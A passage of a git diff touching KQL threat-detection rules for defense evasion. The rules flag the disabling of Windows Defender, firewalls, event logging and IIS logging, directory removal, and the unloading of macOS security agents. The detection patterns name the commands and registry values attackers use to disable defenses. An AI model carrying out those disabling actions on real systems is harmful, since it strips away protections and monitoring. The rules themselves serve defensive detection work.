attack.t1218 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: DeviceCredentialDeployment Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: medium +// Description: Detects the execution of DeviceCredentialDeployment to hide a process from view. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where FolderPath endswith "\\DeviceCredentialDeployment.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/devtoolslauncher_exe_executes_specified_binary.kql b/KQL/rules/Defense Evasion/devtoolslauncher_exe_executes_specified_binary.kql index f4b9513a..db3e6a16 100644 --- a/KQL/rules/Defense Evasion/devtoolslauncher_exe_executes_specified_binary.kql +++ b/KQL/rules/Defense Evasion/devtoolslauncher_exe_executes_specified_binary.kql @@ -1,12 +1,12 @@ -// Title: Devtoolslauncher.exe Executes Specified Binary -// Author: Beyu Denis, oscd.community (rule), @_felamos (idea) -// Date: 2019-10-12 -// Level: high -// Description: The Devtoolslauncher.exe executes other binary -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate use of devtoolslauncher.exe by legitimate user - -DeviceProcessEvents +// Title: Devtoolslauncher.exe Executes Specified Binary +// Author: Beyu Denis, oscd.community (rule), @_felamos (idea) +// Date: 2019-10-12 +// Level: high +// Description: The Devtoolslauncher.exe executes other binary +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate use of devtoolslauncher.exe by legitimate user + +DeviceProcessEvents | where ProcessCommandLine contains "LaunchForDeploy" and FolderPath endswith "\\devtoolslauncher.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql b/KQL/rules/Defense Evasion/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql index c691ea5e..3a11d65f 100644 --- a/KQL/rules/Defense Evasion/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql +++ b/KQL/rules/Defense Evasion/diagnostic_library_sdiageng_dll_loaded_by_msdt_exe.kql @@ -1,10 +1,10 @@ -// Title: Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE -// Author: Greg (rule) -// Date: 2022-06-17 -// Level: high -// Description: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1202, cve.2022-30190 - -DeviceImageLoadEvents +// Title: Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE +// Author: Greg (rule) +// Date: 2022-06-17 +// Level: high +// Description: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202, cve.2022-30190 + +DeviceImageLoadEvents | where FolderPath endswith "\\sdiageng.dll" and InitiatingProcessFolderPath endswith "\\msdt.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql b/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql index d3c7427f..95270396 100644 --- a/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql +++ b/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql @@ -1,13 +1,13 @@ -// Title: Directory Removal Via Rmdir -// Author: frack113 -// Date: 2022-01-15 -// Level: low -// Description: Detects execution of the builtin "rmdir" command in order to delete directories. -// Adversaries may delete files left behind by the actions of their intrusion activity. -// Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. -// Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.004 - -DeviceProcessEvents +// Title: Directory Removal Via Rmdir +// Author: frack113 +// Date: 2022-01-15 +// Level: low +// Description: Detects execution of the builtin "rmdir" command in order to delete directories. +// Adversaries may delete files left behind by the actions of their intrusion activity. +// Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. +// Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.004 + +DeviceProcessEvents | where (ProcessCommandLine contains "/s" or ProcessCommandLine contains "/q") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") and ProcessCommandLine contains "rmdir" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql b/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql index 10ed4f45..e2918b7f 100644 --- a/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql +++ b/KQL/rules/Defense Evasion/directory_service_restore_mode_dsrm_registry_value_tampering.kql @@ -1,15 +1,15 @@ -// Title: Directory Service Restore Mode(DSRM) Registry Value Tampering -// Author: Nischal Khadgi -// Date: 2024-07-11 -// Level: high -// Description: Detects changes to "DsrmAdminLogonBehavior" registry value. -// During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure. -// Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory. -// If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM. -// If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped. -// If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.credential-access, attack.persistence, attack.t1556 - -DeviceRegistryEvents +// Title: Directory Service Restore Mode(DSRM) Registry Value Tampering +// Author: Nischal Khadgi +// Date: 2024-07-11 +// Level: high +// Description: Detects changes to "DsrmAdminLogonBehavior" registry value. +// During a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure. +// Attackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory. +// If the "DsrmAdminLogonBehavior" value is set to "0", the administrator account can only be used if the DC starts in DSRM. +// If the "DsrmAdminLogonBehavior" value is set to "1", the administrator account can only be used if the local AD DS service is stopped. +// If the "DsrmAdminLogonBehavior" value is set to "2", the administrator account can always be used. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.persistence, attack.t1556 + +DeviceRegistryEvents | where RegistryKey endswith "\\Control\\Lsa\\DsrmAdminLogonBehavior" and (not(RegistryValueData =~ "DWORD (0x00000000)")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_administrative_share_creation_at_startup.kql b/KQL/rules/Defense Evasion/disable_administrative_share_creation_at_startup.kql index acdb950c..5c10c66e 100644 --- a/KQL/rules/Defense Evasion/disable_administrative_share_creation_at_startup.kql +++ b/KQL/rules/Defense Evasion/disable_administrative_share_creation_at_startup.kql @@ -1,10 +1,10 @@ -// Title: Disable Administrative Share Creation at Startup -// Author: frack113 -// Date: 2022-01-16 -// Level: medium -// Description: Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.005 - -DeviceRegistryEvents +// Title: Disable Administrative Share Creation at Startup +// Author: frack113 +// Date: 2022-01-16 +// Level: medium +// Description: Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.005 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Services\\LanmanServer\\Parameters*" and (RegistryKey endswith "\\AutoShareWks" or RegistryKey endswith "\\AutoShareServer") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_exploit_guard_network_protection_on_windows_defender.kql b/KQL/rules/Defense Evasion/disable_exploit_guard_network_protection_on_windows_defender.kql index 98c891e0..ce615daf 100644 --- a/KQL/rules/Defense Evasion/disable_exploit_guard_network_protection_on_windows_defender.kql +++ b/KQL/rules/Defense Evasion/disable_exploit_guard_network_protection_on_windows_defender.kql @@ -1,10 +1,10 @@ -// Title: Disable Exploit Guard Network Protection on Windows Defender -// Author: Austin Songer @austinsonger -// Date: 2021-08-04 -// Level: medium -// Description: Detects disabling Windows Defender Exploit Guard Network Protection -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 - -DeviceRegistryEvents +// Title: Disable Exploit Guard Network Protection on Windows Defender +// Author: Austin Songer @austinsonger +// Date: 2021-08-04 +// Level: medium +// Description: Detects disabling Windows Defender Exploit Guard Network Protection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (00000001)" and RegistryKey contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center\\App and Browser protection\\DisallowExploitProtectionOverride" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_macro_runtime_scan_scope.kql b/KQL/rules/Defense Evasion/disable_macro_runtime_scan_scope.kql index 557ba58a..bb8b3f33 100644 --- a/KQL/rules/Defense Evasion/disable_macro_runtime_scan_scope.kql +++ b/KQL/rules/Defense Evasion/disable_macro_runtime_scan_scope.kql @@ -1,10 +1,10 @@ -// Title: Disable Macro Runtime Scan Scope -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-10-25 -// Level: high -// Description: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceRegistryEvents +// Title: Disable Macro Runtime Scan Scope +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-10-25 +// Level: high +// Description: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE*" and RegistryKey endswith "\\Microsoft\\Office*" and RegistryKey contains "\\Common\\Security") and RegistryKey endswith "\\MacroRuntimeScanScope" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_microsoft_defender_firewall_via_registry.kql b/KQL/rules/Defense Evasion/disable_microsoft_defender_firewall_via_registry.kql index 13fdd341..4f2a5274 100644 --- a/KQL/rules/Defense Evasion/disable_microsoft_defender_firewall_via_registry.kql +++ b/KQL/rules/Defense Evasion/disable_microsoft_defender_firewall_via_registry.kql @@ -1,10 +1,10 @@ -// Title: Disable Microsoft Defender Firewall via Registry -// Author: frack113 -// Date: 2022-01-09 -// Level: medium -// Description: Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.004 - -DeviceRegistryEvents +// Title: Disable Microsoft Defender Firewall via Registry +// Author: frack113 +// Date: 2022-01-09 +// Level: medium +// Description: Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Services\\SharedAccess\\Parameters\\FirewallPolicy*" and RegistryKey endswith "\\EnableFirewall" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_or_stop_services.kql b/KQL/rules/Defense Evasion/disable_or_stop_services.kql index 05d94219..3cf1fbe5 100644 --- a/KQL/rules/Defense Evasion/disable_or_stop_services.kql +++ b/KQL/rules/Defense Evasion/disable_or_stop_services.kql @@ -1,12 +1,12 @@ -// Title: Disable Or Stop Services -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-09-15 -// Level: medium -// Description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Disable Or Stop Services +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-15 +// Level: medium +// Description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (ProcessCommandLine contains "stop" or ProcessCommandLine contains "disable") and (FolderPath endswith "/service" or FolderPath endswith "/systemctl" or FolderPath endswith "/chkconfig") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_privacy_settings_experience_in_registry.kql b/KQL/rules/Defense Evasion/disable_privacy_settings_experience_in_registry.kql index 287d5e1d..776e4c3e 100644 --- a/KQL/rules/Defense Evasion/disable_privacy_settings_experience_in_registry.kql +++ b/KQL/rules/Defense Evasion/disable_privacy_settings_experience_in_registry.kql @@ -1,12 +1,12 @@ -// Title: Disable Privacy Settings Experience in Registry -// Author: frack113 -// Date: 2022-10-02 -// Level: medium -// Description: Detects registry modifications that disable Privacy Settings Experience -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Legitimate admin script - -DeviceRegistryEvents +// Title: Disable Privacy Settings Experience in Registry +// Author: frack113 +// Date: 2022-10-02 +// Level: medium +// Description: Detects registry modifications that disable Privacy Settings Experience +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate admin script + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows\\OOBE\\DisablePrivacyExperience" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_pua_protection_on_windows_defender.kql b/KQL/rules/Defense Evasion/disable_pua_protection_on_windows_defender.kql index 139d72bb..7ea03a49 100644 --- a/KQL/rules/Defense Evasion/disable_pua_protection_on_windows_defender.kql +++ b/KQL/rules/Defense Evasion/disable_pua_protection_on_windows_defender.kql @@ -1,10 +1,10 @@ -// Title: Disable PUA Protection on Windows Defender -// Author: Austin Songer @austinsonger -// Date: 2021-08-04 -// Level: high -// Description: Detects disabling Windows Defender PUA protection -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 - -DeviceRegistryEvents +// Title: Disable PUA Protection on Windows Defender +// Author: Austin Songer @austinsonger +// Date: 2021-08-04 +// Level: high +// Description: Detects disabling Windows Defender PUA protection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Policies\\Microsoft\\Windows Defender\\PUAProtection" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_security_tools.kql b/KQL/rules/Defense Evasion/disable_security_tools.kql index a37b7aed..8fed30a3 100644 --- a/KQL/rules/Defense Evasion/disable_security_tools.kql +++ b/KQL/rules/Defense Evasion/disable_security_tools.kql @@ -1,12 +1,12 @@ -// Title: Disable Security Tools -// Author: Daniil Yugoslavskiy, oscd.community -// Date: 2020-10-19 -// Level: medium -// Description: Detects disabling security tools -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Legitimate activities - -DeviceProcessEvents +// Title: Disable Security Tools +// Author: Daniil Yugoslavskiy, oscd.community +// Date: 2020-10-19 +// Level: medium +// Description: Detects disabling security tools +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate activities + +DeviceProcessEvents | where ((ProcessCommandLine contains "unload" and FolderPath =~ "/bin/launchctl") and (ProcessCommandLine contains "com.objective-see.lulu.plist" or ProcessCommandLine contains "com.objective-see.blockblock.plist" or ProcessCommandLine contains "com.google.santad.plist" or ProcessCommandLine contains "com.carbonblack.defense.daemon.plist" or ProcessCommandLine contains "com.carbonblack.daemon.plist" or ProcessCommandLine contains "at.obdev.littlesnitchd.plist" or ProcessCommandLine contains "com.tenablesecurity.nessusagent.plist" or ProcessCommandLine contains "com.opendns.osx.RoamingClientConfigUpdater.plist" or ProcessCommandLine contains "com.crowdstrike.falcond.plist" or ProcessCommandLine contains "com.crowdstrike.userdaemon.plist" or ProcessCommandLine contains "osquery" or ProcessCommandLine contains "filebeat" or ProcessCommandLine contains "auditbeat" or ProcessCommandLine contains "packetbeat" or ProcessCommandLine contains "td-agent")) or (ProcessCommandLine contains "disable" and FolderPath =~ "/usr/sbin/spctl") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_tamper_protection_on_windows_defender.kql b/KQL/rules/Defense Evasion/disable_tamper_protection_on_windows_defender.kql index 06ad0973..32689112 100644 --- a/KQL/rules/Defense Evasion/disable_tamper_protection_on_windows_defender.kql +++ b/KQL/rules/Defense Evasion/disable_tamper_protection_on_windows_defender.kql @@ -1,10 +1,10 @@ -// Title: Disable Tamper Protection on Windows Defender -// Author: Austin Songer @austinsonger -// Date: 2021-08-04 -// Level: medium -// Description: Detects disabling Windows Defender Tamper Protection -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 - -DeviceRegistryEvents +// Title: Disable Tamper Protection on Windows Defender +// Author: Austin Songer @austinsonger +// Date: 2021-08-04 +// Level: medium +// Description: Detects disabling Windows Defender Tamper Protection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceRegistryEvents | where (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows Defender\\Features\\TamperProtection") and (not(((InitiatingProcessFolderPath endswith "\\MsMpEng.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") or InitiatingProcessFolderPath =~ "C:\\Program Files\\Windows Defender\\MsMpEng.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_windows_defender_av_security_monitoring.kql b/KQL/rules/Defense Evasion/disable_windows_defender_av_security_monitoring.kql index 751507f4..ae00516d 100644 --- a/KQL/rules/Defense Evasion/disable_windows_defender_av_security_monitoring.kql +++ b/KQL/rules/Defense Evasion/disable_windows_defender_av_security_monitoring.kql @@ -1,12 +1,12 @@ -// Title: Disable Windows Defender AV Security Monitoring -// Author: ok @securonix invrep-de, oscd.community, frack113 -// Date: 2020-10-12 -// Level: high -// Description: Detects attackers attempting to disable Windows Defender using Powershell -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice. - -DeviceProcessEvents +// Title: Disable Windows Defender AV Security Monitoring +// Author: ok @securonix invrep-de, oscd.community, frack113 +// Date: 2020-10-12 +// Level: high +// Description: Detects attackers attempting to disable Windows Defender using Powershell +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice. + +DeviceProcessEvents | where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "-DisableBehaviorMonitoring $true" or ProcessCommandLine contains "-DisableRuntimeMonitoring $true")) or ((FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe") and ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "WinDefend") or (ProcessCommandLine contains "config" and ProcessCommandLine contains "WinDefend" and ProcessCommandLine contains "start=disabled") or (ProcessCommandLine contains "stop" and ProcessCommandLine contains "WinDefend"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_windows_defender_functionalities_via_registry_keys.kql b/KQL/rules/Defense Evasion/disable_windows_defender_functionalities_via_registry_keys.kql index b11de363..7b55237f 100644 --- a/KQL/rules/Defense Evasion/disable_windows_defender_functionalities_via_registry_keys.kql +++ b/KQL/rules/Defense Evasion/disable_windows_defender_functionalities_via_registry_keys.kql @@ -1,13 +1,13 @@ -// Title: Disable Windows Defender Functionalities Via Registry Keys -// Author: AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel -// Date: 2022-08-01 -// Level: high -// Description: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Administrator actions via the Windows Defender interface -// - Third party Antivirus - -DeviceRegistryEvents +// Title: Disable Windows Defender Functionalities Via Registry Keys +// Author: AlertIQ, Ján Trenčanský, frack113, Nasreddine Bencherchali, Swachchhanda Shrawan Poudel +// Date: 2022-08-01 +// Level: high +// Description: Detects when attackers or tools disable Windows Defender functionalities via the Windows registry +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Administrator actions via the Windows Defender interface +// - Third party Antivirus + +DeviceRegistryEvents | where (RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows Defender*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows Defender*") and ((RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\DisallowExploitProtectionOverride" or RegistryKey endswith "\\Features\\TamperProtection" or RegistryKey endswith "\\MpEngine\\MpEnablePus" or RegistryKey endswith "\\PUAProtection" or RegistryKey endswith "\\Signature Update\\ForceUpdateFromMU" or RegistryKey endswith "\\SpyNet\\SpynetReporting" or RegistryKey endswith "\\SpyNet\\SubmitSamplesConsent" or RegistryKey endswith "\\Windows Defender Exploit Guard\\Controlled Folder Access\\EnableControlledFolderAccess")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\DisableAntiSpyware" or RegistryKey endswith "\\DisableAntiVirus" or RegistryKey endswith "\\DisableBehaviorMonitoring" or RegistryKey endswith "\\DisableBlockAtFirstSeen" or RegistryKey endswith "\\DisableEnhancedNotifications" or RegistryKey endswith "\\DisableIntrusionPreventionSystem" or RegistryKey endswith "\\DisableIOAVProtection" or RegistryKey endswith "\\DisableOnAccessProtection" or RegistryKey endswith "\\DisableRealtimeMonitoring" or RegistryKey endswith "\\DisableScanOnRealtimeEnable" or RegistryKey endswith "\\DisableScriptScanning"))) and (not((InitiatingProcessFolderPath endswith "\\sepWscSvc64.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_windows_event_logging_via_registry.kql b/KQL/rules/Defense Evasion/disable_windows_event_logging_via_registry.kql index e357894c..8a8e498c 100644 --- a/KQL/rules/Defense Evasion/disable_windows_event_logging_via_registry.kql +++ b/KQL/rules/Defense Evasion/disable_windows_event_logging_via_registry.kql @@ -1,12 +1,12 @@ -// Title: Disable Windows Event Logging Via Registry -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-04 -// Level: high -// Description: Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.002 -// False Positives: -// - Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting - -DeviceRegistryEvents +// Title: Disable Windows Event Logging Via Registry +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-04 +// Level: high +// Description: Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 +// False Positives: +// - Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting + +DeviceRegistryEvents | where (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels*" and RegistryKey endswith "\\Enabled") and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\winsxs\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-FileInfoMinifilter" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-ASN1*" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Kernel-AppCompat*" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Runtime\\Error*" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-CAPI2/Operational*")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Compat-Appraiser") or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\wevtutil.exe"))) and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath)))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_windows_firewall_by_registry.kql b/KQL/rules/Defense Evasion/disable_windows_firewall_by_registry.kql index ba01e570..f6313dff 100644 --- a/KQL/rules/Defense Evasion/disable_windows_firewall_by_registry.kql +++ b/KQL/rules/Defense Evasion/disable_windows_firewall_by_registry.kql @@ -1,10 +1,10 @@ -// Title: Disable Windows Firewall by Registry -// Author: frack113 -// Date: 2022-08-19 -// Level: medium -// Description: Detect set EnableFirewall to 0 to disable the Windows firewall -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.004 - -DeviceRegistryEvents +// Title: Disable Windows Firewall by Registry +// Author: frack113 +// Date: 2022-08-19 +// Level: medium +// Description: Detect set EnableFirewall to 0 to disable the Windows firewall +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\StandardProfile\\EnableFirewall" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\DomainProfile\\EnableFirewall") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_windows_iis_http_logging.kql b/KQL/rules/Defense Evasion/disable_windows_iis_http_logging.kql index 75cd9ac3..3fed0f88 100644 --- a/KQL/rules/Defense Evasion/disable_windows_iis_http_logging.kql +++ b/KQL/rules/Defense Evasion/disable_windows_iis_http_logging.kql @@ -1,10 +1,10 @@ -// Title: Disable Windows IIS HTTP Logging -// Author: frack113 -// Date: 2022-01-09 -// Level: high -// Description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.002 - -DeviceProcessEvents +// Title: Disable Windows IIS HTTP Logging +// Author: frack113 +// Date: 2022-01-09 +// Level: high +// Description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 + +DeviceProcessEvents | where (ProcessCommandLine contains "set" and ProcessCommandLine contains "config" and ProcessCommandLine contains "section:httplogging" and ProcessCommandLine contains "dontLog:true") and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disabled_ie_security_features.kql b/KQL/rules/Defense Evasion/disabled_ie_security_features.kql index 9e582b93..58810f62 100644 --- a/KQL/rules/Defense Evasion/disabled_ie_security_features.kql +++ b/KQL/rules/Defense Evasion/disabled_ie_security_features.kql @@ -1,10 +1,10 @@ -// Title: Disabled IE Security Features -// Author: Florian Roth (Nextron Systems) -// Date: 2020-06-19 -// Level: high -// Description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 - -DeviceProcessEvents +// Title: Disabled IE Security Features +// Author: Florian Roth (Nextron Systems) +// Date: 2020-06-19 +// Level: high +// Description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 + +DeviceProcessEvents | where (ProcessCommandLine contains " -name IEHarden " and ProcessCommandLine contains " -value 0 ") or (ProcessCommandLine contains " -name DEPOff " and ProcessCommandLine contains " -value 1 ") or (ProcessCommandLine contains " -name DisableFirstRunCustomize " and ProcessCommandLine contains " -value 2 ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disabled_volume_snapshots.kql b/KQL/rules/Defense Evasion/disabled_volume_snapshots.kql index 943826de..3156f377 100644 --- a/KQL/rules/Defense Evasion/disabled_volume_snapshots.kql +++ b/KQL/rules/Defense Evasion/disabled_volume_snapshots.kql @@ -1,12 +1,12 @@ -// Title: Disabled Volume Snapshots -// Author: Florian Roth (Nextron Systems) -// 